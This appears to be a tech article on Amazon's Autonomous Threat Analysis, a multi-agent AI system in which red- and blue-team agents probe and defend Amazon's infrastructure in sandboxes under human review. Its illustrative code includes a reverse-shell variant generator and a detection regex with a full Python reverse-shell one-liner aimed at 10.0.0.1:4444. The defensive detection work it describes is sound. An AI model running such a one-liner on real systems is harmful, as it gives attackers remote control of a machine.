As artificial intelligence speeds up software development in the tech industry, it is also changing the landscape of cyber offense and defense. Faster coding leads to more frequent releases, which means more opportunities for bugs, vulnerabilities, and overlooked security gaps. Meanwhile, attackers, from cybercriminals to state-sponsored groups, are increasingly using generative AI to automate reconnaissance, develop exploits, and carry out large-scale attacks.
To keep up with this shift, Amazon has embraced AI on a large scale. For the first time, the company is publicly sharing details about an internal system called Autonomous Threat Analysis (ATA). This multi-agent AI framework is designed to proactively find vulnerabilities in Amazon’s vast infrastructure before malicious actors do. Born out of an internal hackathon in August 2024, ATA has become a key security tool that combines AI creativity with human oversight.
A Multi-Agent System Born from a Hackathon
ATA did not come from a lengthy strategic plan. It started as a creative project during an Amazon hackathon, a setting where employees frequently pitch unconventional ideas.
One idea came from Amazon security engineer Michael Moran. He proposed a system where multiple specialized AI agents could replicate the roles of human red and blue teams. Instead of using a single, large AI model to simulate attacks and defenses, the plan focused on a competitive, team-based system, where agents could challenge and improve each other’s work.
The idea quickly gained traction.
“The initial concept aimed to address a critical limitation in security testing: limited coverage and the challenge of keeping detection capabilities current,” Steve Schmidt, Chief Security Officer at Amazon, explained.
The size of Amazon’s ecosystem—thousands of applications, millions of lines of code, and production environments around the world—makes thorough manual analysis impossible. Schmidt noted that even with a strong security team, human reviewers alone cannot check or test every potential weakness in time.
This lack of coverage was exactly what ATA aimed to fix.
Why Amazon Needed an Automated Threat Engine
Tech companies today face a dual threat:
- Exponential growth in software: fast development cycles create more code than traditional security teams can vet.
- AI-enhanced attackers: malicious actors now use generative AI to create advanced phishing campaigns, develop malware variants, and automate exploit testing.
Amazon understood that its defensive measures, while substantial, risked falling behind the fast-paced threat landscape. ATA was created to change that.
ATA’s Core: Specialized AI Agents Working in Teams
Unlike traditional security tools, ATA uses multiple AI agents, each with a specific role, working together in coordinated teams. These agents simulate both offensive and defensive strategies in a controlled, realistic environment tailored to Amazon’s actual systems.
Red Team Agents
These agents function as attackers. They:
- Explore possible exploits
- Test real commands in sandboxed, production-like systems
- Generate new attack techniques
- Produce logs showing how exploits work in practice
Blue Team Agents
These agents focus on defense. They:
- Analyze real telemetry from attacks
- Suggest new detection rules
- Recommend remediation actions
- Confirm whether protections successfully block threats
Both sides operate in real, verifiable environments rather than hypothetical simulations.
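The red/blue interplay described above can be sketched as a simple adversarial loop. Everything below is an illustrative assumption, not Amazon's implementation: the class names, the substring "rules," and the fabricated log lines are stand-ins for a real sandbox and detection engine.

```python
from dataclasses import dataclass

# Hypothetical sketch of ATA-style red/blue coordination. All names and
# logic are illustrative assumptions, not Amazon's actual system.

@dataclass
class Finding:
    technique: str          # attack technique the red agent tried
    log_evidence: str       # telemetry captured when it ran in the sandbox
    detected: bool = False  # set by the blue agent after rule evaluation

class RedAgent:
    """Proposes attack techniques and records sandbox evidence."""
    def probe(self, technique: str) -> Finding:
        # A real system would execute the command in a production-like
        # sandbox; here we fabricate a log line for illustration.
        return Finding(technique, log_evidence=f"exec: {technique}")

class BlueAgent:
    """Evaluates detection rules against red-team evidence."""
    def __init__(self, rules: list[str]):
        self.rules = rules  # naive substring rules, for illustration only
    def evaluate(self, finding: Finding) -> Finding:
        finding.detected = any(r in finding.log_evidence for r in self.rules)
        return finding

def adversarial_round(techniques: list[str], blue: BlueAgent) -> list[Finding]:
    """Run one red-vs-blue round; return findings the blue side missed."""
    red = RedAgent()
    findings = [blue.evaluate(red.probe(t)) for t in techniques]
    # Undetected findings drive the next iteration of rule writing.
    return [f for f in findings if not f.detected]

gaps = adversarial_round(
    ["python -c reverse_shell", "curl beacon"],
    BlueAgent(rules=["reverse_shell"]),
)
```

The key design point the article attributes to ATA is that each side's output feeds the other: red-team findings that slip past detection become the blue team's next work item.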
High-Fidelity Testing Environments: ATA’s Secret Weapon
As Amazon scaled ATA, one of its major investments was developing high-fidelity test systems—environments so realistic that AI agents can engage with them as if they were Amazon’s actual production infrastructure.
These environments:
- Generate real system telemetry
- Provide accurate logs and execution traces
- Allow AI agents to mimic real-world operations without risking live systems
This “sandbox realism” makes ATA exceptionally effective. Instead of just theorizing about how an attack might function, agents carry out actual commands and observe the genuine results.
Designed Against Hallucinations
One major concern with generative AI, especially in critical areas like cybersecurity, is hallucination, or fabricating details without evidence.
Amazon claims ATA avoids this through its design, rather than relying on correction afterward.
ATA requires:
- Timestamped logs
- Observable telemetry
- Reproducible results
No claim from an agent is accepted unless it is verified by actual system evidence.
This requirement is meant to rule out hallucination by construction, not merely to reduce it.
“Because the system demands observable evidence, hallucinations are architecturally impossible,” Steve Schmidt said.
While many AI tools struggle to produce reliable, accurate outputs, ATA’s “evidence first” approach sets it apart.
Machine-Speed Security: AI Agents Generate and Patch Variants Instantly
Where human security researchers might investigate one exploit at a time, ATA’s agents can create hundreds of variants in just minutes.
Michael Moran explains, “I get to come in with all the novel techniques and say, ‘I wonder if this would work?’ And now I have an entire scaffolding… It enables everything to run at machine speed.”
This allows for:
- More creative attack paths explored
- Quicker detection of variant vulnerabilities
- Faster review cycles
- Rapid iteration between red and blue teams
The system acts as a force multiplier, allowing human experts to focus on complex analysis instead of repetitive or time-consuming tasks.
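Machine-speed variant generation of the kind described here can be pictured as combinatorial expansion of one base technique. The component lists below are hypothetical placeholders (the payload bodies are elided); the idea is that small lists of interchangeable parts multiply into many concrete test cases.

```python
import itertools

# Hypothetical sketch: expand one technique template into many concrete
# variants, each of which a red agent could then test in the sandbox.
# Component lists are illustrative and deliberately abbreviated.

INTERPRETERS = ["python3", "python"]
CONNECTORS = ["socket.connect", "socket.create_connection"]
SPAWNS = ["os.system('/bin/sh')", "subprocess.call('/bin/sh')",
          "pty.spawn('/bin/sh')"]

def generate_variants():
    """Yield every combination of the interchangeable components."""
    for interp, conn, spawn in itertools.product(INTERPRETERS, CONNECTORS,
                                                 SPAWNS):
        yield f'{interp} -c "...{conn}(...); {spawn}"'

variants = list(generate_variants())
# 2 * 2 * 3 = 12 variants from one template; real component lists
# would be far larger, and the growth is multiplicative.
```

This is why a human might study one exploit while the system enumerates hundreds: each new interchangeable component multiplies, rather than adds to, the number of variants to test.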
Real-World Example: Reverse Shell Defense Breakthrough
One of ATA’s early successes involved analyzing Python-based reverse shell techniques—a common method hackers use to gain remote control of a device.
Within hours, the system:
- Identified obscure variations of reverse shell methods
- Generated new attack chains
- Suggested detection and remediation rules
- Verified the effectiveness of those protections in real environments
The result: Amazon’s defenses achieved a 100% detection rate for the tested variants.
This level of coverage would have taken humans days or even weeks to replicate.
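A detection rule of the kind ATA might propose for this class of technique can be sketched as a pattern over process command lines. The regex below is an illustrative assumption, not one of Amazon's actual rules, and a real rule would be far more robust to obfuscation.

```python
import re

# Minimal sketch of a Python reverse-shell detection heuristic: flag
# command lines that combine an inline Python invocation, a socket,
# and a shell spawn. Illustrative only; trivially evadable in practice.

REVERSE_SHELL_RULE = re.compile(
    r"python[\d.]*\s+-c\s+.*socket.*(/bin/sh|/bin/bash|pty\.spawn)",
    re.IGNORECASE | re.DOTALL,
)

def flag(cmdline: str) -> bool:
    """Return True if the command line matches the reverse-shell pattern."""
    return bool(REVERSE_SHELL_RULE.search(cmdline))

malicious = ('python3 -c "import socket,os,pty;'
             "s=socket.socket();s.connect(('10.0.0.1',4444));"
             "pty.spawn('/bin/sh')\"")
benign = "python3 manage.py runserver"
```

Verifying such a rule against every generated variant in a sandbox, rather than by inspection, is what the article credits for the 100% detection rate on the tested set.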
Human in the Loop: AI Generates, Humans Govern
Despite its autonomy, ATA does not act unilaterally in production.
Every detection rule, every remediation suggestion, and every proposed system change must go through human review. Amazon refers to this as “human in the loop,” which ensures transparency and accountability.
Schmidt emphasizes that ATA is not a replacement for human red teams or experienced analysts:
“ATA is not a substitute for advanced, nuanced human security testing. But it takes on the mundane tasks so humans can focus on the complex problems.”
The objective is to remove tedious work—not expertise.
The Next Phase: Real-Time Incident Response
So far, ATA has mainly been used as a proactive tool—searching for weaknesses, identifying exploit variations, and strengthening defenses.
However, Amazon’s security leaders believe the future lies in using ATA during active incidents.
In real-time scenarios, ATA could:
- Identify patterns in attack telemetry
- Suggest immediate containment strategies
- Generate detection rules within minutes
- Assist responders as threats develop
This could significantly shorten the time between detection and remediation—a critical factor during large-scale attacks.
Reducing Alert Fatigue for Human Analysts
Security teams across the industry struggle with false positives, which consume time and attention. ATA alleviates this burden by verifying findings with actual system data before passing them to humans.
As a result, Amazon’s analysts spend less time sorting through noise and more time investigating real, credible threats.
Schmidt sums up the value:
“AI does the grunt work. When our team is freed from analyzing false positives, they can focus on real threats.”
A New Model for AI-Driven Cybersecurity
Amazon’s ATA reflects a broader trend that is reshaping cybersecurity:
- AI attackers are getting stronger; AI defenders must evolve.
- Manual testing alone can’t keep up; automated variant generation is crucial.
- Security must be continuous and evidence-based; hallucination-free AI is a necessity, not a luxury.
While other tech giants experiment with AI security tools, Amazon’s multi-agent and adversarial-team approach stands out as one of the most ambitious efforts to date.
With ATA, Amazon is not just automating tests; it is replicating the dynamics of human red and blue teams at machine speed.
For a company with one of the largest digital footprints globally, this capability may soon prove essential.